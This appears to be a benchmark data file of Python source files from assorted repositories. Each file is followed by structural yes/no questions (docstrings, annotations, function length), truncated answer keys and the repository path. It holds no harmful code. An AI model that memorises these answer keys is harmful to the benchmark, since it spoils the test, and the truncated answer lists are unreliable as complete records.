"""
Utility functions
"""
def flatten(this_list: Sequence[Sequence[T]]) -> List[T]:
    """Flattens a nested list.
    Args:
        (list): A list of lists.
    Returns:
        (list): The flattened list.
    """
    flat: List[T] = []
    for sublist in this_list:
        flat.extend(sublist)
    return flat
def lattice_mc_string(polyhedron: CoordinationPolyhedron,
                      neighbour_list: Dict[int, Tuple[int, ...]]) -> str:
    """Returns a string representation of a polyhedron as a `lattice_mc`_
    site-input formatted site.
    .. _lattice_mc: https://github.com/bjmorgan/lattice_mc
    Args:
        polyhedron (CoordinationPolyhedron): The coordination polyhedron.
        neighbour_list (dict): Neighbour list dictionary.
    Returns:
        str
    Example:
        >>> nlist = {1: (3, 5, 8), ...}
        >>> lattice_mc_string(polyhedron, neighbour_list=nlist
        site: 1
        centre: 2.94651000 1.70116834 1.20290767
        neighbours: 3 5 8
        label: oct
    """
    centre = " ".join(f"{c:.8f}" for c in polyhedron.central_atom.coords)
    neighbours = " ".join(str(i) for i in neighbour_list[polyhedron.index])
    lines = [f'site: {polyhedron.index}',
             f'centre: {centre}',
             f'neighbours: {neighbours}',
             f'label: {polyhedron.label}']
    return "\n".join(lines) + "\n"
def prune_neighbour_list(neighbours: Dict[int, Tuple[int, ...]],
                         indices: List[int]) -> Dict[int, Tuple[int, ...]]:
    """Restrict a neighbour list to a subset of site indices.

    Keeps only entries whose key is in *indices*, and within each kept
    entry drops neighbours that are not themselves in *indices*.
    (Replaces the placeholder "TODO" docstring.)

    Args:
        neighbours (dict): Map of site index -> tuple of neighbour indices.
        indices (list): The site indices to retain.

    Returns:
        dict: The pruned neighbour list.
    """
    # Build the membership set once instead of per-entry.
    index_set = set(indices)
    return {site: tuple(set(nbrs) & index_set)
            for site, nbrs in neighbours.items()
            if site in index_set}
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer... | 4 | polyhedral_analysis/utils.py | bjmorgan/polyhedral-analysis |
from rest_framework import serializers
from carts.models import Cart
from merchandises.models import Merchandise
from django.contrib.auth import get_user_model
from rest_framework.validators import UniqueTogetherValidator
from django.db.models import Sum, Avg, Count
class CartSerializer(serializers.ModelSerializer):
    """Cart representation enriched with item, customer and merchant details."""
    # Computed/display fields; each SerializerMethodField resolves via the
    # matching get_<name> method below.
    item_name = serializers.SerializerMethodField()
    customer = serializers.StringRelatedField()
    customer_email = serializers.SerializerMethodField()
    merchant = serializers.StringRelatedField()
    item_price = serializers.SerializerMethodField()
    item_price_dec = serializers.SerializerMethodField()
    item_merchant_email = serializers.SerializerMethodField()
    on_stock = serializers.SerializerMethodField()
    created = serializers.SerializerMethodField()

    class Meta:
        model = Cart
        fields = '__all__'

    def get_item_name(self, instance):
        """Title of the item in the cart."""
        return instance.item.title

    def get_customer_email(self, instance):
        """Email address of the cart's customer."""
        return instance.customer.email

    # NOTE(review): no 'item_merchant' SerializerMethodField is declared above,
    # so this resolver appears unused — verify against the frontend.
    def get_item_merchant(self, instance):
        return instance.item.merchant.username

    def get_item_merchant_email(self, instance):
        """Email address of the merchant selling the item."""
        return instance.item.merchant.email

    def get_item_price(self, instance):
        """Integer part of the item price."""
        return instance.item.price

    def get_item_price_dec(self, instance):
        """Decimal part of the item price."""
        return instance.item.price_dec

    def get_on_stock(self, instance):
        """Current stock level of the item."""
        return instance.item.on_stock

    def get_created(self, instance):
        """Creation date formatted as e.g. 'January 01 2020'."""
        return instance.created.strftime('%B %d %Y')

    # def get_total_pieces(self, obj):
    #     totalpieces = Catalog.objects.all().aggregate(total_pieces=Count('no_of_pcs'))
    #     return totalpieces["total_pieces"]

    # def get_total_price(self, obj):
    #     totalprice = Catalog.objects.all().aggregate(total_price=Sum('per_piece_price'))
    #     return totalprice["total_price"]
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | carts/api/serializers.py | it-teaching-abo-akademi/webshop-project-arnelimperial |
# 6. Больше числа п. В программе напишите функцию, которая принимает два
# аргумента: список и число п. Допустим, что список содержит числа. Функция
# должна показать все числа в списке, которые больше п.
import random
def main():
    """Generate 20 random numbers, ask for n, and show those greater than n."""
    numbers = [random.randint(0, 100) for _ in range(20)]
    print(numbers)
    n = int(input('entered n: '))
    print("This is list " + str(check_n(numbers, n)) + " of numbers\nthat are "
          "greater than the number you provided ", n, ".", sep="")
def check_n(list_num, n):
    """Return the numbers in *list_num* strictly greater than *n*.

    :param list_num: list of numbers to filter
    :param n: threshold value
    :return: new list with the qualifying numbers, in their original order
    """
    # Comprehension replaces the index-based loop-and-append.
    return [value for value in list_num if value > n]
if __name__ == "__main__":
    # Guard so importing this module does not immediately block on input().
    main()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | chapter_07/06_larger_than_n.py | SergeHall/Tony-Gaddis-Python-4th |
from ..utils import Object
class GetLoginUrl(Object):
    """
    Returns an HTTP URL which can be used to automatically authorize the user
    on a website after clicking an inline button of type
    inlineKeyboardButtonTypeLoginUrl. Use getLoginUrlInfo first to find whether
    a prior user confirmation is needed; if an error is returned, the button
    must be handled as an ordinary URL button.

    Attributes:
        ID (:obj:`str`): ``GetLoginUrl``

    Args:
        chat_id (:obj:`int`):
            Chat identifier of the message with the button
        message_id (:obj:`int`):
            Message identifier of the message with the button
        button_id (:obj:`int`):
            Button identifier
        allow_write_access (:obj:`bool`):
            True, if the user allowed the bot to send them messages

    Returns:
        HttpUrl

    Raises:
        :class:`telegram.Error`
    """
    ID = "getLoginUrl"

    def __init__(self, chat_id, message_id, button_id, allow_write_access, extra=None, **kwargs):
        self.extra = extra
        self.chat_id = chat_id  # int
        self.message_id = message_id  # int
        self.button_id = button_id  # int
        self.allow_write_access = allow_write_access  # bool

    @staticmethod
    def read(q: dict, *args) -> "GetLoginUrl":
        # Pull the four known fields out of the raw dict; extra keys are ignored.
        fields = (
            q.get('chat_id'),
            q.get('message_id'),
            q.get('button_id'),
            q.get('allow_write_access'),
        )
        return GetLoginUrl(*fields)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | pytglib/api/functions/get_login_url.py | iTeam-co/pytglib |
import torch
import torch.nn as nn
class ComplexResGate(nn.Module):
    """Gated residual combination of two embeddings.

    Concatenates m and m_tild, computes a sigmoid gate from the
    concatenation, and projects the gated concatenation back to
    ``embedding_size``.
    """

    def __init__(self, embedding_size):
        super(ComplexResGate, self).__init__()
        # Layer creation order is part of the contract (reproducible RNG init).
        self.fc1 = nn.Linear(2 * embedding_size, 2 * embedding_size)
        self.fc2 = nn.Linear(2 * embedding_size, embedding_size)
        self.sigmoid = nn.Sigmoid()

    def forward(self, m, m_tild):
        """Fuse m and m_tild; both are (..., seq, embedding_size) tensors."""
        combined = torch.cat((m, m_tild), dim=2)
        gate = self.sigmoid(self.fc1(combined))
        return self.fc2(gate * combined)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self... | 3 | model/complex_res_gate.py | ajyl/MIME |
from django.conf import settings
from storages.backends.s3boto import S3BotoStorage
class S3StaticStorage(S3BotoStorage):
    "S3 storage backend that sets the static bucket."

    def __init__(self, *args, **kwargs):
        # Pin this backend to the static-files bucket and its custom domain;
        # plain http URLs (secure_urls=False) as in the media backend below.
        super(S3StaticStorage, self).__init__(
            *args,
            bucket=settings.AWS_STATIC_BUCKET_NAME,
            custom_domain=settings.AWS_STATIC_CUSTOM_DOMAIN,
            secure_urls=False,
            **kwargs
        )
class S3MediaStorage(S3BotoStorage):
    "S3 storage backend that sets the media bucket."

    def __init__(self, *args, **kwargs):
        # Pin this backend to the media (uploads) bucket and its custom domain.
        super(S3MediaStorage, self).__init__(
            *args,
            bucket=settings.AWS_STORAGE_BUCKET_NAME,
            custom_domain=settings.AWS_S3_CUSTOM_DOMAIN,
            secure_urls=False,
            **kwargs
        )
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
... | 3 | coderdojochi/custom_storages.py | rgroves/weallcode-website |
"""Test the fogfreq script
"""
from unittest.mock import patch
@patch("argparse.ArgumentParser", autospec=True)
def test_get_parser(ap):
import fogtools.analysis.foghist2d
fogtools.analysis.foghist2d.get_parser()
assert ap.return_value.add_argument.call_count == 1
@patch("fogtools.analysis.foghist2d.get_parser", autospec=True)
@patch("fogtools.plot.Visualiser", autospec=True)
def test_main(v, pc):
import fogtools.analysis.foghist2d
pc.return_value.parse_args.return_value.out = "tofu"
fogtools.analysis.foghist2d.main()
pc.assert_called_once_with()
v.return_value.plot_fog_dt_hist.assert_called_once_with("tofu")
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | tests/test_foghist2d.py | gerritholl/fogtools |
import sys
from os.path import join, relpath, dirname
upper_dir = join(dirname(relpath(__file__)), "..")
sys.path.append(upper_dir)
from torch import nn, cat
from base_model import ImageClassificationLightningModule
from typing import Callable
class EfficientNetLightningModuleWithTwoBackbones(ImageClassificationLightningModule):
    """Classifier fusing an RGB and an infrared backbone.

    Each backbone encodes its modality; the two latent vectors are
    concatenated and classified by a small head.
    """

    def __init__(
        self,
        backbone_rgb: nn.Module,
        backbone_infrared: nn.Module,
        get_x_method: Callable,
        num_classes: int,
    ):
        super().__init__(backbone_rgb, get_x_method, num_classes)
        # Output width of a single backbone; the head sees both, hence 2x.
        backbone_out_dim = backbone_rgb._fc.out_features
        self.classifier = nn.Sequential(
            nn.ReLU(),
            nn.Linear(2 * backbone_out_dim, num_classes),
            self.activation,  # presumably set by the base module -- TODO confirm
        )
        self.backbone_rgb = backbone_rgb
        self.backbone_infrared = backbone_infrared

    def forward(self, x):
        """x is a (rgb_batch, infrared_batch) pair; returns class scores."""
        rgb_input, infrared_input = x
        fused = cat(
            (self.backbone_rgb(rgb_input), self.backbone_infrared(infrared_input)),
            dim=1,
        )
        return self.classifier(fused)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"... | 3 | app/image_classification/models_with_two_separate_backbones/efficientnet_with_two_separate_backbones.py | tugot17/RGB-Infrared-Classification |
# -*- coding: utf-8 -*-
"""Contains constants for middleware layer."""
from typing import Tuple, Union
class Text:
    """Global text-rendering defaults, exposed as read-only properties."""

    @property
    def global_font(self) -> str:
        """Default font family name."""
        return "Helvetica"

    @property
    def global_font_size(self) -> Union[float, int]:
        """Default font size."""
        return 12

    @property
    def global_font_color(
        self,
    ) -> Tuple[Union[float, int], Union[float, int], Union[float, int]]:
        """Default RGB font color (black)."""
        return 0, 0, 0

    @property
    def global_text_x_offset(self) -> Union[float, int]:
        """Default horizontal text offset."""
        return 0

    @property
    def global_text_y_offset(self) -> Union[float, int]:
        """Default vertical text offset."""
        return 0

    @property
    def global_text_wrap_length(self) -> int:
        """Default text wrap length."""
        return 100
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer"... | 3 | PyPDFForm/middleware/constants.py | XinyuLiu5566/PyPDFForm |
"""
Runtime: 6200 ms, faster than 5.01% of Python3 online submissions for Container With Most Water.
Memory Usage: 27.5 MB, less than 57.22% of Python3 online submissions for Container With Most Water.
"""
from typing import List
from typing import Optional
class Solution:
    """LeetCode 11 -- Container With Most Water."""

    def maxArea(self, height: List[int]) -> int:
        """Return the max water area between two of the given vertical lines.

        Standard two-pointer scan: always advance the shorter side, since the
        area is bounded by the shorter line and shrinking the width on the
        taller side can never help. O(n) time, O(1) space -- the original
        re-sliced ``max(height[i:j])`` each step, making it O(n^2).

        Args:
            height: line heights; fewer than two lines yields 0.

        Returns:
            The largest achievable area.
        """
        left, right = 0, len(height) - 1
        best = 0
        while left < right:
            width = right - left
            if height[left] <= height[right]:
                best = max(best, width * height[left])
                left += 1
            else:
                best = max(best, width * height[right])
                right -= 1
        return best
def main():
    """Demo the solver on a sample input alongside the expected answer."""
    solver = Solution()
    print('Output:', solver.maxArea([2,3,10,5,7,8,9]))
    print('Expected:', 36)

if __name__ == "__main__":
    main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | solutions/11. Container With Most Water.py | JacopoPan/leetcode-top100-liked-questions |
# -*- coding: utf-8 -*-
from flask import request, current_app
from domain.models import Image, Document
from validation.base_validators import ParameterizedValidator
import repo
class CanCreateFacilityValidator(ParameterizedValidator):
    """Fails the request with 403 unless the current user may create facilities."""

    def validate(self, f, *args, **kwargs):
        # Resolve the user from the request cookies, then ask the repo layer.
        user_id = repo.get_user_id_for_user(cookies=request.cookies)
        valid = user_id and repo.can_user_create_facility(user_id, cookies=request.cookies)
        if not valid:
            self.fail("You do not have privileges to create a facility.",
                      f, 403, None, *args, **kwargs)
class CanEditFacilityValidator(ParameterizedValidator):
    """Fails the request with 403 unless the user may edit the targeted facility.

    The facility id is resolved from, in order: the route kwargs directly,
    a related image, a related document, or the POSTed form field.
    """

    def validate(self, f, *args, **kwargs):
        # BUG FIX: previously facility_id was only bound inside the branches,
        # so a request matching none of them raised NameError below. Default
        # to None; can_user_edit_facility is then expected to reject it
        # (fails closed) -- TODO confirm repo behavior for facility_id=None.
        facility_id = None
        if kwargs.get("facility_id", None):  # the normal case: a facility
            facility_id = kwargs["facility_id"]
        elif kwargs.get("image_id", None):  # an image related to a facility
            image = current_app.db_session.query(Image).get(kwargs["image_id"])
            facility_id = image.facility_id
        elif kwargs.get("document_id", None):  # a document related to a facility
            document = current_app.db_session.query(Document).get(kwargs["document_id"])
            facility_id = document.facility_id
        elif request.form.get('facilityId', None):  # POST image/document with facility id in form
            facility_id = request.form.get('facilityId')
        user_id = repo.get_user_id_for_user(cookies=request.cookies)
        valid = user_id and repo.can_user_edit_facility(user_id, facility_id,
                                                        cookies=request.cookies)
        if not valid:
            self.fail("You do not have privileges to edit facility %s." % facility_id,
                      f, 403, None, *args, **kwargs)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": false
}... | 3 | flod_facilities_backend/validation/credential_validators.py | Trondheim-kommune/Bookingbasen |
from ipynta.sourcing import DirectorySniffer
from ipynta.loaders import PillowLoader
from ipynta.transform import GrayscaleTransform
from os import path
import pytest
SAMPLES_DIR = path.dirname(path.abspath(__file__)) + "/sample_images/grayscale"
@pytest.fixture
def sample_images():
    """Pillow images loaded from every file in the grayscale samples dir."""
    img_list = DirectorySniffer().get_img_paths(SAMPLES_DIR)
    return PillowLoader().load(img_list)
def _check_if_grayscale(img):
"""Method used for checking if an image is grayscale or colored.
Args:
images (PIL.Image): Image to check.
Returns:
boolean: True if the image is grayscale, False otherwise.
"""
tmp = img.convert('RGB')
w, h = img.size
for i in range(w):
for j in range(h):
r, g, b = tmp.getpixel((i,j))
if r != g != b:
return False
return True
def test_grayscale_transform_init():
    """Constructing a GrayscaleTransform must not raise."""
    try:
        GrayscaleTransform()
    except Exception:
        pytest.fail("GrayscaleTransform constructor failed")
@pytest.mark.parametrize("test_input", [
    (None),
    ([]),
])
def test_grayscale_transform_vs_empty_list(test_input):
    """None or an empty list must yield an empty list, not an error."""
    grayscale_img_list = GrayscaleTransform().execute(test_input)
    output_count = len(grayscale_img_list)
    assert(output_count == 0)
    assert(isinstance(grayscale_img_list, list))
def test_grayscale_output_count(sample_images):
    """The transform preserves the number of images."""
    grayscale_img_list = GrayscaleTransform().execute(sample_images)
    output_count = len(grayscale_img_list)
    assert(output_count == len(sample_images))
def test_grayscale_output_type(sample_images):
    """The transform returns a plain list."""
    grayscale_img_list = GrayscaleTransform().execute(sample_images)
    assert(isinstance(grayscale_img_list, list))
def test_grayscale_output_colors(sample_images):
    """Every output image must actually be grayscale."""
    grayscale_img_list = GrayscaleTransform().execute(sample_images)
    grayscale_flags = [_check_if_grayscale(img) for img in grayscale_img_list]
    assert(all(grayscale_flags))
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding ... | 3 | src/tests/transform/test_grayscale_transform.py | allanchua101/ipynta |
import math
import requests
def calc_dist(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two lat/lon points (haversine).

    Inputs are in degrees; 6372.8 km is the Earth radius used here.
    """
    lat1, lon1, lat2, lon2 = map(math.radians, (lat1, lon1, lat2, lon2))
    h = math.sin( (lat2 - lat1) / 2 ) ** 2 + \
        math.cos(lat1) * \
        math.cos(lat2) * \
        math.sin( (lon2 - lon1) / 2 ) ** 2
    earth_radius_km = 6372.8
    return earth_radius_km * 2 * math.asin(math.sqrt(h))
def get_dist(meteor):
    """Sort key: the meteor's computed distance; infinity when absent."""
    fallback = math.inf
    return meteor.get('distance', fallback)
if __name__ == '__main__':
    # Reference point the distances are measured from (San Antonio, TX).
    my_loc = (29.424122, -98.493628)
    # NASA open-data meteorite landings dataset (network call).
    meteor_resp = requests.get('https://data.nasa.gov/resource/y77d-th95.json')
    meteor_data = meteor_resp.json()
    for meteor in meteor_data:
        # Records without coordinates keep no 'distance' key and sort last.
        if not ('reclat' in meteor and 'reclong' in meteor): continue
        meteor['distance'] = calc_dist(float(meteor['reclat']),
                                       float(meteor['reclong']),
                                       my_loc[0],
                                       my_loc[1])
    meteor_data.sort(key=get_dist)
    # Print the ten closest meteorites.
    print(meteor_data[0:10])
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding sel... | 3 | meteors/find_meteors.py | Mathman628/find-close-meteorites |
from PySide import QtGui, QtCore
from AttributeWidgetImpl import AttributeWidget
class ScalarWidget(AttributeWidget):
    """Attribute editor widget for scalar floats, backed by a validated QLineEdit."""

    def __init__(self, attribute, parentWidget=None, addNotificationListener = True):
        super(ScalarWidget, self).__init__(attribute, parentWidget=parentWidget, addNotificationListener = addNotificationListener)
        hbox = QtGui.QHBoxLayout()
        self._widget = QtGui.QLineEdit(self)
        # Restrict keyboard input to doubles with up to 3 decimals.
        validator = QtGui.QDoubleValidator(self)
        validator.setDecimals(3)
        self._widget.setValidator(validator)
        hbox.addWidget(self._widget, 1)
        hbox.addStretch(0)
        hbox.setContentsMargins(0, 0, 0, 0)
        self.setLayout(hbox)
        self.setSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
        self.updateWidgetValue()
        # Editable attributes push changes back on editingFinished; others are read-only.
        if self.isEditable():
            self._widget.editingFinished.connect(self._invokeSetter)
        else:
            self._widget.setReadOnly(True)

    def getWidgetValue(self):
        # Current text parsed as float (validator guarantees parseability).
        return float(self._widget.text())

    def setWidgetValue(self, value):
        # Display rounded to 4 decimals (one more than the input validator allows).
        self._widget.setText(str(round(value, 4)))

    @classmethod
    def canDisplay(cls, attribute):
        # This widget handles all scalar float data types.
        return(
            attribute.getDataType() == 'Scalar' or
            attribute.getDataType() == 'Float32' or
            attribute.getDataType() == 'Float64'
        )


# Register this widget with the port-widget factory so it can be instantiated.
ScalarWidget.registerPortWidget()
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | Python/kraken/ui/DataTypeWidgets/ScalarWidgetImpl.py | FabricExile/Kraken |
# coding: utf-8
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. # noqa: E501
The version of the OpenAPI document: 1.0.9-1295
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import intersight
from intersight.models.inventory_generic_inventory_holder_ref import InventoryGenericInventoryHolderRef # noqa: E501
from intersight.rest import ApiException
class TestInventoryGenericInventoryHolderRef(unittest.TestCase):
    """Unit test stubs for InventoryGenericInventoryHolderRef."""

    def setUp(self):
        """No fixtures needed for these stubs."""
        pass

    def tearDown(self):
        """Nothing to clean up."""
        pass

    def testInventoryGenericInventoryHolderRef(self):
        """Test InventoryGenericInventoryHolderRef"""
        # FIXME: construct object with mandatory attributes with example values
        # model = intersight.models.inventory_generic_inventory_holder_ref.InventoryGenericInventoryHolderRef()  # noqa: E501
        pass


if __name__ == '__main__':
    unittest.main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": ... | 3 | test/test_inventory_generic_inventory_holder_ref.py | sdnit-se/intersight-python |
from __future__ import absolute_import
from __future__ import unicode_literals
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import copy
# \ref page 4, layers=2, forward + backward, concat[forward_projection, backward_projection]
class LstmbiLm(nn.Module):
    """Bidirectional LSTM encoder whose two directions are separately
    projected back to ``projection_dim`` and concatenated.
    """

    def __init__(self, config, use_cuda=False):
        super(LstmbiLm, self).__init__()
        self.config = config
        self.use_cuda = use_cuda
        encoder_cfg = config['encoder']
        self.encoder = nn.LSTM(
            encoder_cfg['projection_dim'],
            encoder_cfg['dim'],
            num_layers=encoder_cfg['n_layers'],
            bidirectional=True,
            batch_first=True,
            dropout=config['dropout'],
        )
        # One shared projection applied to each direction's half.
        self.projection = nn.Linear(encoder_cfg['dim'], encoder_cfg['projection_dim'], bias=True)

    def forward(self, inputs):
        """Encode ``inputs`` (batch, seq, projection_dim); returns
        (batch, seq, 2*projection_dim) with forward/backward halves concatenated."""
        hidden_size = self.config['encoder']['dim']
        outputs, _ = self.encoder(inputs)
        # The bidirectional output is [forward | backward] along the last dim.
        fwd, bwd = outputs.split(hidden_size, 2)
        return torch.cat([self.projection(fwd), self.projection(bwd)], dim=2)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding ... | 3 | elmoformanylangs/modules/lstm.py | luomou97/ELMoForManyLangs |
class FtpOutputListQueryParams(object):
    """Query parameters for listing FTP outputs (pagination plus name filter)."""

    def __init__(self, offset=None, limit=None, name=None):
        # type: (int, int, string_types) -> None
        super(FtpOutputListQueryParams, self).__init__()
        self.offset = offset
        self.limit = limit
        self.name = name

    @property
    def openapi_types(self):
        """Attribute name -> OpenAPI type string."""
        return {
            'offset': 'int',
            'limit': 'int',
            'name': 'string_types',
        }

    @property
    def attribute_map(self):
        """Attribute name -> serialized (wire) name."""
        return {
            'offset': 'offset',
            'limit': 'limit',
            'name': 'name',
        }
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than... | 3 | bitmovin_api_sdk/encoding/outputs/ftp/ftp_output_list_query_params.py | jaythecaesarean/bitmovin-api-sdk-python |
import datetime as dt
from flask import current_app
from polylogyx.db.database import db
class ConfigDomain:
    """Returns a node's configuration and records the check-in."""

    def __init__(self, node, remote_addr):
        # node: the enrolled node model instance; remote_addr: client IP string.
        self.node = node
        self.remote_addr = remote_addr

    def get_config(self):
        """Fetch the node's config, then persist last check-in time and IP."""
        current_app.logger.info(
            "%s - %s checking in to retrieve a new configuration",
            self.remote_addr,
            self.node,
        )
        config = self.node.get_config()
        # write last_checkin, last_ip
        self.node.update(
            last_config=dt.datetime.utcnow(),
            last_checkin=dt.datetime.utcnow(),
            last_ip=self.remote_addr,
        )
        db.session.add(self.node)
        db.session.commit()
        return config
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | plgx-esp/polylogyx/domain/config_domain.py | eclecticiq/eiq-er-ce |
class Node:
    """Singly linked-list node."""

    def __init__(self, x):
        self.val = x      # payload
        self.next = None  # successor; None at the tail

    def __str__(self):
        """Render the chain from this node, e.g. "[1 ->2 ->None]"."""
        parts = ["["]
        cursor = self
        while cursor:
            parts.append("{} ->".format(cursor.val))
            cursor = cursor.next
        parts.append("None]")
        return "".join(parts)
def get_nodes(values):
    """Build a linked list from *values*; returns the head (None if empty)."""
    head = None
    # Walk the values back-to-front so each new node points at the previous head.
    for value in values[::-1]:
        node = Node(value)
        node.next = head
        head = node
    return head
def get_list(head):
    """Collect node values into a Python list, front to back."""
    values = []
    cursor = head
    while cursor:
        values.append(cursor.val)
        cursor = cursor.next
    return values
def rotate_ll(llist, k):
    """Rotate the linked list right by k places and return the new head.

    BUG FIX: the original crashed or returned a corrupted list when
    ``k == 0`` or ``k`` was a multiple of the length (``new_tail`` stayed
    None / the list was cycled and cut at the wrong node). k is now
    normalized with ``k % size`` so any non-negative k works.

    Args:
        llist: head node (or None).
        k: non-negative rotation count.

    Returns:
        The head of the rotated list (the input head when no rotation
        is needed).
    """
    if llist is None:
        return None
    # One pass to find the tail and the length.
    size = 1
    tail = llist
    while tail.next:
        tail = tail.next
        size += 1
    k %= size
    if k == 0:
        return llist
    # Node just before the new head sits size-k-1 hops from the old head.
    new_tail = llist
    for _ in range(size - k - 1):
        new_tail = new_tail.next
    new_head = new_tail.next
    tail.next = llist
    new_tail.next = None
    return new_head
# Tests
# [7, 7, 3, 5] rotated right by 2 -> [3, 5, 7, 7]; [1..5] by 3 -> [3, 4, 5, 1, 2].
assert get_list(rotate_ll(get_nodes([7, 7, 3, 5]), 2)) == [3, 5, 7, 7]
assert get_list(rotate_ll(get_nodes([1, 2, 3, 4, 5]), 3)) == [3, 4, 5, 1, 2]
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answ... | 3 | solutions/problem_177.py | ksvr444/daily-coding-problem |
import pandas as pd
import numpy as np
def replace_outliers(data, columns):
    '''
    Quantile-based Flooring and Capping: values below the 10th percentile
    are raised to it, values above the 90th are lowered to it. Operates on
    (and returns) a copy; the input frame is untouched.
    '''
    capped = data.copy()
    for col in columns:
        lower = (capped[col].quantile(0.10))
        upper = (capped[col].quantile(0.90))
        capped[col] = np.where(capped[col] < lower, lower, capped[col])
        capped[col] = np.where(capped[col] > upper, upper, capped[col])
    return capped
def add_knn_feature(model, data, columns_to_drop):
    """Append *model*'s predictions as a 'Knn' column.

    The listed columns are dropped before predicting; the input frame is
    not modified -- a new frame is returned.
    """
    features = data.copy().drop(columns_to_drop, axis=1)
    predictions = model.predict(features)
    features['Knn'] = predictions
    return features
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/... | 3 | src/features/build_features.py | HninPwint/nba-career-prediction |
"""modify migration
Revision ID: d1168fc41a41
Revises: 05fe6c4da706
Create Date: 2022-03-14 08:46:15.711561
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd1168fc41a41'
down_revision = '05fe6c4da706'
branch_labels = None
depends_on = None
def upgrade():
    """Drop the free-text columns from the blogs and comments tables."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('blogs', 'text')
    op.drop_column('comments', 'comment')
    # ### end Alembic commands ###
def downgrade():
    """Re-add the dropped columns (data removed by upgrade is not restored)."""
    # ### commands auto generated by Alembic - please adjust! ###
